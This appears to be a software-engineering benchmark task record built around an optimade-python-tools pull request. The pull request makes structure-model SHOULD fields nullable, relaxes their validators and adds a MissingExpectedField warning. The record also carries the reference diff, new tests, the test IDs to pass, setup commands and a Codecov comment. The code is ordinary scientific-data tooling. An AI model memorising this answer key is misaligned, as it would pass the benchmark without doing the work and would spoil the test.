i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - MUST have length equal to the number of sites in the structure (first dimension of the list property `cartesian_site_positions`).\n - Each species name mentioned in the `species_at_sites` list MUST be described in the list property `species` (i.e. for each value in the `species_at_sites` list there MUST exist exactly one dictionary in the `species` list with the `name` attribute equal to the corresponding `species_at_sites` value).\n - Each site MUST be associated only to a single species.\n **Note**: However, species can represent mixtures of atoms, and multiple species MAY be defined for the same chemical element.\n This latter case is useful when different atoms of the same type need to be grouped or distinguished, for instance in simulation codes to assign different initial spin states.\n\n- **Examples**:\n - `[\"Ti\",\"O2\"]` indicates that the first site is hosting a species labeled `\"Ti\"` and the second a species labeled `\"O2\"`.\n - `[\"Ac\", \"Ac\", \"Ag\", \"Ir\"]` indicating the first two sites contains the `\"Ac\"` species, while the third and fourth sites contain the `\"Ag\"` and `\"Ir\"` species, respectively." 
+ "description": "Name of the species at each site (where values for sites are specified with the same order of the property `cartesian_site_positions`).\nThe properties of the species are found in the property `species`.\n\n- **Type**: list of strings.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - MUST have length equal to the number of sites in the structure (first dimension of the list property `cartesian_site_positions`).\n - Each species name mentioned in the `species_at_sites` list MUST be described in the list property `species` (i.e. for each value in the `species_at_sites` list there MUST exist exactly one dictionary in the `species` list with the `name` attribute equal to the corresponding `species_at_sites` value).\n - Each site MUST be associated only to a single species.\n **Note**: However, species can represent mixtures of atoms, and multiple species MAY be defined for the same chemical element.\n This latter case is useful when different atoms of the same type need to be grouped or distinguished, for instance in simulation codes to assign different initial spin states.\n\n- **Examples**:\n - `[\"Ti\",\"O2\"]` indicates that the first site is hosting a species labeled `\"Ti\"` and the second a species labeled `\"O2\"`.\n - `[\"Ac\", \"Ac\", \"Ag\", \"Ir\"]` indicating the first two sites contains the `\"Ac\"` species, while the third and fourth sites contain the `\"Ag\"` and `\"Ir\"` species, respectively.", + "nullable": true }, "assemblies": { "title": "Assemblies", diff --git a/optimade/models/entries.py b/optimade/models/entries.py index 9a74189a..f26cc7a8 100644 --- a/optimade/models/entries.py +++ b/optimade/models/entries.py @@ -74,7 +74,7 @@ class EntryResourceAttributes(Attributes): queryable=SupportLevel.MUST, ) - 
last_modified: datetime = OptimadeField( + last_modified: Optional[datetime] = OptimadeField( ..., description="""Date and time representing when the entry was last modified. diff --git a/optimade/models/structures.py b/optimade/models/structures.py index 82ad7f1c..dc2bebb8 100644 --- a/optimade/models/structures.py +++ b/optimade/models/structures.py @@ -1,5 +1,6 @@ # pylint: disable=no-self-argument,line-too-long,no-name-in-module import re +import warnings from enum import IntEnum, Enum from sys import float_info from typing import List, Optional, Union @@ -16,6 +17,7 @@ from optimade.models.utils import ( ANONYMOUS_ELEMENTS, CHEMICAL_FORMULA_REGEXP, ) +from optimade.server.warnings import MissingExpectedField EXTENDED_CHEMICAL_SYMBOLS = CHEMICAL_SYMBOLS + EXTRA_SYMBOLS @@ -143,7 +145,7 @@ Note: With regards to "source database", we refer to the immediate source being @validator("concentration") def validate_concentration(cls, v, values): - if "chemical_symbols" in values: + if values.get("chemical_symbols"): if len(v) != len(values["chemical_symbols"]): raise ValueError( f"Length of concentration ({len(v)}) MUST equal length of chemical_symbols " @@ -242,10 +244,18 @@ The possible reasons for the values not to sum to one are the same as already sp return v +CORRELATED_STRUCTURE_FIELDS = ( + {"dimension_types", "nperiodic_dimensions"}, + {"cartesian_site_positions", "species_at_sites"}, + {"nsites", "cartesian_site_positions"}, + {"species_at_sites", "species"}, +) + + class StructureResourceAttributes(EntryResourceAttributes): """This class contains the Field for the attributes used to represent a structure, e.g. unit cell, atoms, positions.""" - elements: List[str] = OptimadeField( + elements: Optional[List[str]] = OptimadeField( ..., description="""Names of the different elements present in the structure. 
@@ -269,7 +279,7 @@ class StructureResourceAttributes(EntryResourceAttributes): queryable=SupportLevel.MUST, ) - nelements: int = OptimadeField( + nelements: Optional[int] = OptimadeField( ..., description="""Number of different elements in the structure as an integer. @@ -290,7 +300,7 @@ class StructureResourceAttributes(EntryResourceAttributes): queryable=SupportLevel.MUST, ) - elements_ratios: List[float] = OptimadeField( + elements_ratios: Optional[List[float]] = OptimadeField( ..., description="""Relative proportions of different elements in the structure. @@ -314,7 +324,7 @@ class StructureResourceAttributes(EntryResourceAttributes): queryable=SupportLevel.MUST, ) - chemical_formula_descriptive: str = OptimadeField( + chemical_formula_descriptive: Optional[str] = OptimadeField( ..., description="""The chemical formula for a structure as a string in a form chosen by the API implementation. @@ -342,7 +352,7 @@ class StructureResourceAttributes(EntryResourceAttributes): queryable=SupportLevel.MUST, ) - chemical_formula_reduced: str = OptimadeField( + chemical_formula_reduced: Optional[str] = OptimadeField( ..., description="""The reduced chemical formula for a structure as a string with element symbols and integer chemical proportion numbers. The proportion number MUST be omitted if it is 1. @@ -403,7 +413,7 @@ The proportion number MUST be omitted if it is 1. regex=CHEMICAL_FORMULA_REGEXP, ) - chemical_formula_anonymous: str = OptimadeField( + chemical_formula_anonymous: Optional[str] = OptimadeField( ..., description="""The anonymous formula is the `chemical_formula_reduced`, but where the elements are instead first ordered by their chemical proportion number, and then, in order left to right, replaced by anonymous symbols A, B, C, ..., Z, Aa, Ba, ..., Za, Ab, Bb, ... and so on. @@ -425,8 +435,10 @@ The proportion number MUST be omitted if it is 1. 
regex=CHEMICAL_FORMULA_REGEXP, ) - dimension_types: conlist(Periodicity, min_items=3, max_items=3) = OptimadeField( - ..., + dimension_types: Optional[ + conlist(Periodicity, min_items=3, max_items=3) + ] = OptimadeField( + None, description="""List of three integers. For each of the three directions indicated by the three lattice vectors (see property `lattice_vectors`), this list indicates if the direction is periodic (value `1`) or non-periodic (value `0`). Note: the elements in this list each refer to the direction of the corresponding entry in `lattice_vectors` and *not* the Cartesian x, y, z directions. @@ -448,7 +460,7 @@ Note: the elements in this list each refer to the direction of the corresponding queryable=SupportLevel.OPTIONAL, ) - nperiodic_dimensions: int = OptimadeField( + nperiodic_dimensions: Optional[int] = OptimadeField( ..., description="""An integer specifying the number of periodic dimensions in the structure, equivalent to the number of non-zero entries in `dimension_types`. @@ -470,10 +482,10 @@ Note: the elements in this list each refer to the direction of the corresponding queryable=SupportLevel.MUST, ) - lattice_vectors: conlist( - Vector3D_unknown, min_items=3, max_items=3 - ) = OptimadeField( - ..., + lattice_vectors: Optional[ + conlist(Vector3D_unknown, min_items=3, max_items=3) + ] = OptimadeField( + None, description="""The three lattice vectors in Cartesian coordinates, in ångström (Å). - **Type**: list of list of floats or unknown values. @@ -498,7 +510,7 @@ Note: the elements in this list each refer to the direction of the corresponding queryable=SupportLevel.OPTIONAL, ) - cartesian_site_positions: List[Vector3D] = OptimadeField( + cartesian_site_positions: Optional[List[Vector3D]] = OptimadeField( ..., description="""Cartesian positions of each site in the structure. 
A site is usually used to describe positions of atoms; what atoms can be encountered at a given site is conveyed by the `species_at_sites` property, and the species themselves are described in the `species` property. @@ -519,7 +531,7 @@ A site is usually used to describe positions of atoms; what atoms can be encount queryable=SupportLevel.OPTIONAL, ) - nsites: int = OptimadeField( + nsites: Optional[int] = OptimadeField( ..., description="""An integer specifying the length of the `cartesian_site_positions` property. @@ -539,7 +551,7 @@ A site is usually used to describe positions of atoms; what atoms can be encount support=SupportLevel.SHOULD, ) - species: List[Species] = OptimadeField( + species: Optional[List[Species]] = OptimadeField( ..., description="""A list describing the species of the sites of this structure. Species can represent pure chemical elements, virtual-crystal atoms representing a statistical occupation of a given site by multiple chemical elements, and/or a location to which there are attached atoms, i.e., atoms whose precise location are unknown beyond that they are attached to that position (frequently used to indicate hydrogen atoms attached to another element, e.g., a carbon with three attached hydrogens might represent a methyl group, -CH3). @@ -605,7 +617,7 @@ Species can represent pure chemical elements, virtual-crystal atoms representing queryable=SupportLevel.OPTIONAL, ) - species_at_sites: List[str] = OptimadeField( + species_at_sites: Optional[List[str]] = OptimadeField( ..., description="""Name of the species at each site (where values for sites are specified with the same order of the property `cartesian_site_positions`). The properties of the species are found in the property `species`. @@ -764,6 +776,48 @@ The properties of the species are found in the property `species`. queryable=SupportLevel.MUST, ) + class Config: + def schema_extra(schema, model): + """Two things need to be added to the schema: + + 1. 
Constrained types in pydantic do not currently play nicely with + "Required Optional" fields, i.e. fields must be specified but can be null. + The two contrained list fields, `dimension_types` and `lattice_vectors`, + are OPTIMADE 'SHOULD' fields, which means that they are allowed to be null. + + 2. All OPTIMADE 'SHOULD' fields are allowed to be null, so we manually set them + to be `nullable` according to the OpenAPI definition. + + """ + schema["required"].insert(7, "dimension_types") + schema["required"].insert(9, "lattice_vectors") + + nullable_props = ( + prop + for prop in schema["required"] + if schema["properties"][prop].get("support") == SupportLevel.SHOULD + ) + for prop in nullable_props: + schema["properties"][prop]["nullable"] = True + + @root_validator(pre=True) + def warn_on_missing_correlated_fields(cls, values): + """Emit warnings if a field takes a null value when a value + was expected based on the value/nullity of another field. + """ + accumulated_warnings = [] + for field_set in CORRELATED_STRUCTURE_FIELDS: + missing_fields = {f for f in field_set if values.get(f) is None} + if missing_fields and len(missing_fields) != len(field_set): + accumulated_warnings += [ + f"Structure with values {values} is missing fields {missing_fields} which are required if {field_set - missing_fields} are present." + ] + + for warn in accumulated_warnings: + warnings.warn(warn, MissingExpectedField) + + return values + @validator("chemical_formula_reduced", "chemical_formula_hill") def check_ordered_formula(cls, v, field): if v is None: @@ -800,6 +854,9 @@ The properties of the species are found in the property `species`. @validator("chemical_formula_anonymous") def check_anonymous_formula(cls, v): + if v is None: + return v + elements = tuple(re.findall(r"[A-Z][a-z]*", v)) numbers = [int(n.strip()) for n in re.split(r"[A-Z][a-z]*", v) if n.strip()] @@ -830,12 +887,18 @@ The properties of the species are found in the property `species`. 
@validator("elements") def elements_must_be_alphabetical(cls, v): + if v is None: + return v + if sorted(v) != v: raise ValueError(f"elements must be sorted alphabetically, but is: {v}") return v @validator("elements_ratios") def ratios_must_sum_to_one(cls, v): + if v is None: + return v + if abs(sum(v) - 1) > EPS: raise ValueError( f"elements_ratios MUST sum to 1 within floating point accuracy. It sums to: {sum(v)}" @@ -844,12 +907,10 @@ The properties of the species are found in the property `species`. @validator("nperiodic_dimensions") def check_periodic_dimensions(cls, v, values): - if values.get("dimension_types", []) and v is None: - raise ValueError( - "nperiodic_dimensions is REQUIRED, since dimension_types was provided." - ) + if v is None: + return v - if v != sum(values.get("dimension_types")): + if values.get("dimension_types") and v != sum(values.get("dimension_types")): raise ValueError( f"nperiodic_dimensions ({v}) does not match expected value of {sum(values['dimension_types'])} " f"from dimension_types ({values['dimension_types']})" @@ -859,26 +920,24 @@ The properties of the species are found in the property `species`. @validator("lattice_vectors", always=True) def required_if_dimension_types_has_one(cls, v, values): - if ( - Periodicity.PERIODIC.value in values.get("dimension_types", []) - and v is None - ): - raise ValueError( - f"lattice_vectors is REQUIRED, since dimension_types is not ({(Periodicity.APERIODIC.value,) * 3}) but is " - f"{tuple(getattr(_, 'value', None) for _ in values.get('dimension_types', []))}" - ) + if v is None: + return v - for dim_type, vector in zip(values.get("dimension_types", (None,) * 3), v): - if None in vector and dim_type == Periodicity.PERIODIC.value: - raise ValueError( - f"Null entries in lattice vectors are only permitted when the corresponding dimension type is {Periodicity.APERIODIC.value}. 
" - f"Here: dimension_types = {tuple(getattr(_, 'value', None) for _ in values.get('dimension_types', []))}, lattice_vectors = {v}" - ) + if values.get("dimension_types"): + for dim_type, vector in zip(values.get("dimension_types", (None,) * 3), v): + if None in vector and dim_type == Periodicity.PERIODIC.value: + raise ValueError( + f"Null entries in lattice vectors are only permitted when the corresponding dimension type is {Periodicity.APERIODIC.value}. " + f"Here: dimension_types = {tuple(getattr(_, 'value', None) for _ in values.get('dimension_types', []))}, lattice_vectors = {v}" + ) return v @validator("lattice_vectors") def null_values_for_whole_vector(cls, v): + if v is None: + return v + for vector in v: if None in vector and any((isinstance(_, float) for _ in vector)): raise ValueError( @@ -888,7 +947,12 @@ The properties of the species are found in the property `species`. @validator("nsites") def validate_nsites(cls, v, values): - if v != len(values.get("cartesian_site_positions", [])): + if v is None: + return v + + if values.get("cartesian_site_positions") and v != len( + values.get("cartesian_site_positions", []) + ): raise ValueError( f"nsites (value: {v}) MUST equal length of cartesian_site_positions " f"(value: {len(values.get('cartesian_site_positions', []))})" @@ -897,35 +961,39 @@ The properties of the species are found in the property `species`. @validator("species_at_sites") def validate_species_at_sites(cls, v, values): - if "nsites" not in values: - raise ValueError( - "Attribute nsites missing so unable to verify species_at_sites." 
- ) - if len(v) != values.get("nsites", 0): + if v is None: + return v + + if values.get("nsites") and len(v) != values.get("nsites"): raise ValueError( f"Number of species_at_sites (value: {len(v)}) MUST equal number of sites " f"(value: {values.get('nsites', 'Not specified')})" ) - all_species_names = { - getattr(_, "name", None) for _ in values.get("species", [{}]) - } - all_species_names -= {None} - for value in v: - if value not in all_species_names: - raise ValueError( - "species_at_sites MUST be represented by a species' name, " - f"but {value} was not found in the list of species names: {all_species_names}" - ) + if values.get("species"): + all_species_names = { + getattr(_, "name", None) for _ in values.get("species", [{}]) + } + all_species_names -= {None} + for value in v: + if value not in all_species_names: + raise ValueError( + "species_at_sites MUST be represented by a species' name, " + f"but {value} was not found in the list of species names: {all_species_names}" + ) return v @validator("species") def validate_species(cls, v): + if v is None: + return v + all_species = [_.name for _ in v] unique_species = set(all_species) if len(all_species) != len(unique_species): raise ValueError( f"Species MUST be unique based on their 'name'. Found species names: {all_species}" ) + return v @validator("structure_features", always=True) @@ -934,66 +1002,71 @@ The properties of the species are found in the property `species`. 
raise ValueError( f"structure_features MUST be sorted alphabetically, given value: {v}" ) - # disorder - for species in values.get("species", []): - if len(species.chemical_symbols) > 1: - if StructureFeatures.DISORDER not in v: - raise ValueError( - f"{StructureFeatures.DISORDER.value} MUST be present when any one entry in species " - "has a chemical_symbols list greater than one element" - ) - break - else: - if StructureFeatures.DISORDER in v: - raise ValueError( - f"{StructureFeatures.DISORDER.value} MUST NOT be present, since all species' chemical_symbols " - "lists are equal to or less than one element" - ) + # assemblies - if values.get("assemblies", None) is not None: + if values.get("assemblies") is not None: if StructureFeatures.ASSEMBLIES not in v: raise ValueError( f"{StructureFeatures.ASSEMBLIES.value} MUST be present, since the property of the same name is present" ) - else: - if StructureFeatures.ASSEMBLIES in v: - raise ValueError( - f"{StructureFeatures.ASSEMBLIES.value} MUST NOT be present, " - "since the property of the same name is not present" - ) - # site_attachments - for species in values.get("species", []): - # There is no need to also test "nattached", - # since a Species validator makes sure either both are present or both are None. 
- if getattr(species, "attached", None) is not None: - if StructureFeatures.SITE_ATTACHMENTS not in v: + elif StructureFeatures.ASSEMBLIES in v: + raise ValueError( + f"{StructureFeatures.ASSEMBLIES.value} MUST NOT be present, " + "since the property of the same name is not present" + ) + + if values.get("species"): + # disorder + for species in values.get("species", []): + if len(species.chemical_symbols) > 1: + if StructureFeatures.DISORDER not in v: + raise ValueError( + f"{StructureFeatures.DISORDER.value} MUST be present when any one entry in species " + "has a chemical_symbols list greater than one element" + ) + break + else: + if StructureFeatures.DISORDER in v: raise ValueError( - f"{StructureFeatures.SITE_ATTACHMENTS.value} MUST be present when any one entry " - "in species includes attached and nattached" + f"{StructureFeatures.DISORDER.value} MUST NOT be present, since all species' chemical_symbols " + "lists are equal to or less than one element" ) - break - else: - if StructureFeatures.SITE_ATTACHMENTS in v: - raise ValueError( - f"{StructureFeatures.SITE_ATTACHMENTS.value} MUST NOT be present, since no species includes " - "the attached and nattached fields" - ) - # implicit_atoms - species_names = [_.name for _ in values.get("species", [])] - for name in species_names: - if name not in values.get("species_at_sites", []): - if StructureFeatures.IMPLICIT_ATOMS not in v: + # site_attachments + for species in values.get("species", []): + # There is no need to also test "nattached", + # since a Species validator makes sure either both are present or both are None. 
+ if getattr(species, "attached", None) is not None: + if StructureFeatures.SITE_ATTACHMENTS not in v: + raise ValueError( + f"{StructureFeatures.SITE_ATTACHMENTS.value} MUST be present when any one entry " + "in species includes attached and nattached" + ) + break + else: + if StructureFeatures.SITE_ATTACHMENTS in v: raise ValueError( - f"{StructureFeatures.IMPLICIT_ATOMS.value} MUST be present when any one entry in species " - "is not represented in species_at_sites" + f"{StructureFeatures.SITE_ATTACHMENTS.value} MUST NOT be present, since no species includes " + "the attached and nattached fields" ) - break - else: - if StructureFeatures.IMPLICIT_ATOMS in v: - raise ValueError( - f"{StructureFeatures.IMPLICIT_ATOMS.value} MUST NOT be present, since all species are " - "represented in species_at_sites" - ) + # implicit_atoms + species_names = [_.name for _ in values.get("species", [])] + for name in species_names: + if values.get( + "species_at_sites" + ) is not None and name not in values.get("species_at_sites", []): + if StructureFeatures.IMPLICIT_ATOMS not in v: + raise ValueError( + f"{StructureFeatures.IMPLICIT_ATOMS.value} MUST be present when any one entry in species " + "is not represented in species_at_sites" + ) + break + else: + if StructureFeatures.IMPLICIT_ATOMS in v: + raise ValueError( + f"{StructureFeatures.IMPLICIT_ATOMS.value} MUST NOT be present, since all species are " + "represented in species_at_sites" + ) + return v diff --git a/optimade/server/warnings.py b/optimade/server/warnings.py index 18f432d7..7ce40c8b 100644 --- a/optimade/server/warnings.py +++ b/optimade/server/warnings.py @@ -37,3 +37,8 @@ class TooManyValues(OptimadeWarning): class QueryParamNotUsed(OptimadeWarning): """A query parameter is not used in this request.""" + + +class MissingExpectedField(OptimadeWarning): + """A field was provided with a null value when a related field was provided + with a value."""
Relax models to allow for all SHOULD fields to be None This PR tracks the relaxation of our models to allow for None values for almost any field. The current approach for this is to make non-should fields have the type pydantic-type `Optional` but a default value of `...`, which is interpreted as a required OpenAPI field that is allowed to be `None`. This PR then also adds the OpenAPI `nullable` property to each of these fields, indicating that they can be null. To-do: - [x] Change Structure model field types to Optional[...] with default values of `...` - [x] Update model validators to allow them to be robust to missing data - [x] Add combinatorial tests for missing data in structures - [x] Only run server tests under Mongo in CI (rather than all tests) - [x] Add `nullable` to schema
**Title** Allow nullable SHOULD fields in structure models and streamline CI testing **Problem** Clients and implementations may legitimately provide `null` for many structure properties that are only recommended (SHOULD) rather than mandatory. The previous schema forced these fields to be present and non‑null, leading to validation errors and mismatched OpenAPI documentation. Additionally, the CI pipeline ran the full test suite for all back‑ends, unnecessarily exercising non‑Mongo server tests. **Root Cause** Model definitions and validators treated SHOULD fields as required non‑nullable values, and the OpenAPI generator did not mark them as nullable. The CI workflow was not scoped to the Mongo‑specific server test set. **Fix / Expected Behavior** - Redefine all SHOULD fields as optional but still required in the payload, allowing `null` values. - Extend the OpenAPI schema to include the `nullable` flag for each of these fields. - Adjust model validators to gracefully handle missing or `null` values and emit appropriate warnings when correlated fields are inconsistently provided. - Insert a warning class to surface cases where a field is `null` while its dependent counterpart has a value. - Restrict the CI workflow to run only the Mongo‑based server tests, reducing unnecessary test execution. **Risk & Validation** - Verify that mandatory (MUST) fields remain strictly enforced and still reject `null`. - Ensure the generated OpenAPI specification correctly lists `nullable` for all intended fields. - Run the updated Mongo server test suite to confirm no regressions and that warnings are emitted as expected. - Perform a quick sanity check that other back‑ends are not adversely impacted by the CI change.
560
Materials-Consortia/optimade-python-tools
diff --git a/tests/models/test_data/test_bad_structures.json b/tests/models/test_data/test_bad_structures.json index 1204198b..13da97d9 100644 --- a/tests/models/test_data/test_bad_structures.json +++ b/tests/models/test_data/test_bad_structures.json @@ -1503,7 +1503,13 @@ "O", "O" ], - "structure_features": ["assemblies"], + "assemblies": [ + { + "sites_in_groups": [ [0], [1], [2] ], + "group_probabilities": [0.3, 0.5, 0.2] + } + ], + "structure_features": [], "task_id": "mpf_276" }, { @@ -2402,7 +2408,7 @@ "group_probabilities": [0.3, 0.5, 0.2] } ], - "structure_features": ["assemblies"] + "structure_features": [] }, { "task_id": "db/1234567", diff --git a/tests/models/test_structures.py b/tests/models/test_structures.py index 2828c608..84979385 100644 --- a/tests/models/test_structures.py +++ b/tests/models/test_structures.py @@ -1,9 +1,11 @@ # pylint: disable=no-member import pytest +import itertools from pydantic import ValidationError -from optimade.models.structures import StructureResource +from optimade.models.structures import StructureResource, CORRELATED_STRUCTURE_FIELDS +from optimade.server.warnings import MissingExpectedField MAPPER = "StructureMapper" @@ -19,6 +21,33 @@ def test_good_structures(mapper): StructureResource(**mapper(MAPPER).map_back(structure)) +@pytest.mark.filterwarnings("ignore", category=MissingExpectedField) +def test_good_structure_with_missing_data(mapper, good_structure): + """Check deserialization of well-formed structure used + as example data with all combinations of null values + in non-mandatory fields. 
+ """ + structure = {field: good_structure[field] for field in good_structure} + + # Have to include `assemblies` here, although it is only optional, + # `structure_features = ['assemblies']` in the test document so it + # is effectively mandatory + mandatory_fields = ("id", "type", "structure_features", "assemblies") + + total_fields = [ + field + for field in structure["attributes"].keys() + if field not in mandatory_fields + ] + for r in range(len(total_fields)): + for f in itertools.combinations(total_fields, r=r): + incomplete_structure = {field: structure[field] for field in structure} + for field in f: + incomplete_structure["attributes"][field] = None + + StructureResource(**incomplete_structure) + + def test_more_good_structures(good_structures, mapper): """Check well-formed structures with specific edge-cases""" for index, structure in enumerate(good_structures): @@ -27,7 +56,7 @@ def test_more_good_structures(good_structures, mapper): except ValidationError: # Printing to keep the original exception as is, while still being informational print( - f"Good test structure {index} failed to validate from 'test_more_structures.json'" + f"Good test structure {index} failed to validate from 'test_good_structures.json'" ) raise @@ -36,7 +65,9 @@ def test_bad_structures(bad_structures, mapper): """Check badly formed structures""" for index, structure in enumerate(bad_structures): # This is for helping devs finding any errors that may occur - print(f"Trying structure number {index} from 'test_bad_structures.json'") + print( + f"Trying structure number {index}/{len(bad_structures)} from 'test_bad_structures.json'" + ) with pytest.raises(ValidationError): StructureResource(**mapper(MAPPER).map_back(structure)) @@ -139,7 +170,7 @@ deformities = ( @pytest.mark.parametrize("deformity", deformities) -def test_structure_deformities(good_structure, deformity): +def test_structure_fatal_deformities(good_structure, deformity): """Make specific checks upon performing single 
invalidating deformations of the data of a good structure. @@ -153,3 +184,21 @@ def test_structure_deformities(good_structure, deformity): good_structure["attributes"].update(deformity) with pytest.raises(ValidationError, match=fr".*{re.escape(message)}.*"): StructureResource(**good_structure) + + +minor_deformities = ( + {f: None} for f in set(f for _ in CORRELATED_STRUCTURE_FIELDS for f in _) +) + + +@pytest.mark.parametrize("deformity", minor_deformities) +def test_structure_minor_deformities(good_structure, deformity): + """Make specific checks upon performing single minor invalidations + of the data of a good structure that should emit warnings. + """ + if deformity is None: + StructureResource(**good_structure) + else: + good_structure["attributes"].update(deformity) + with pytest.warns(MissingExpectedField): + StructureResource(**good_structure)
[ "tests/models/test_structures.py::test_good_structure_with_missing_data", "tests/models/test_structures.py::test_more_good_structures", "tests/models/test_structures.py::test_bad_structures", "tests/models/test_structures.py::test_structure_fatal_deformities[None]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity1]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity2]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity3]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity4]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity5]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity6]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity7]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity8]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity9]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity10]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity11]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity12]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity13]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity14]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity15]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity16]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity17]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity18]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity19]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity20]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity21]", 
"tests/models/test_structures.py::test_structure_fatal_deformities[deformity22]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity23]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity0]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity1]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity2]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity3]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity4]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity5]" ]
[]
Function: StructureResource(**data) Location: optimade.models.structures.StructureResource Inputs: a mapping (typically a dict) containing the JSON‑API fields required for a structure resource – notably an “id”, “type”, “attributes” dict with optional fields such as `elements`, `nelements`, `dimension_types`, `lattice_vectors`, `cartesian_site_positions`, `nsites`, `species`, `species_at_sites`, `assemblies`, etc. All fields are optional (they may be omitted or set to `None`) but must obey the model’s validation rules (e.g., matching lengths, correlated field consistency). Outputs: an instantiated StructureResource object representing the validated structure entry; raises `pydantic.ValidationError` if required constraints are violated. Description: Constructs a validated OPTIMADE structure resource model; the signature now accepts many fields as nullable (Optional) to accommodate “SHOULD” fields being `null`. Used directly in the tests for both positive validation and expected failures/warnings. Function: MissingExpectedField Location: optimade.server.warnings.MissingExpectedField Inputs: no positional arguments; inherits from `OptimadeWarning` which itself derives from `UserWarning`. Can be instantiated with an optional message string. Outputs: a warning subclass instance that can be caught with `pytest.warns` or the standard `warnings` module. Description: Warning emitted when a structure provides a `null` value for a field that is expected (non‑null) because another correlated field is present. The tests assert that certain minor deformations raise this warning.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/models/test_structures.py" }
{ "num_modified_files": 5, "num_modified_lines": 213, "pr_author": "ml-evs", "pr_labels": [ "models: For issues related to the pydantic models directly", "priority/medium: Issue or PR with a consensus of medium priority", "schema: Concerns the schema models" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.96, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat", "dev_ops_enh", "documentation_enh" ], "reason": null, "reasoning": "The issue clearly requests making all SHOULD fields nullable and robust to missing data, updating validators, adding combinatorial tests, and adjusting CI and OpenAPI schema. The provided test changes directly verify these requirements, matching the stated intent without extra expectations. No signals of test suite coupling, implicit naming, missing specs, external URLs, unrelated patch artifacts, or hidden domain knowledge are present, so the task is a clean, solvable feature change.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, 
"test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
33de78f012f11c27c8063dc726c615ae6de9ea84
2021-01-06 15:29:18
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665?src=pr&el=h1) Report > Merging [#665](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665?src=pr&el=desc) (ccb9cb5) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/790ab7de2efc17b2a5f16b9024590075e503ceed?el=desc) (790ab7d) will **decrease** coverage by `0.08%`. > The diff coverage is `0.00%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #665 +/- ## ========================================== - Coverage 93.45% 93.36% -0.09% ========================================== Files 61 61 Lines 3299 3302 +3 ========================================== Hits 3083 3083 - Misses 216 219 +3 ``` | Flag | Coverage Δ | | |---|---|---| | project | `93.36% <0.00%> (-0.09%)` | :arrow_down: | | validator | `66.05% <0.00%> (-0.07%)` | :arrow_down: | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags#carryforward-flags-in-the-pull-request-comment) to find out more. | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [optimade/validator/validator.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/665/diff?src=pr&el=tree#diff-b3B0aW1hZGUvdmFsaWRhdG9yL3ZhbGlkYXRvci5weQ==) | `82.61% <0.00%> (-0.54%)` | :arrow_down: | ------ [Continue to review full report at 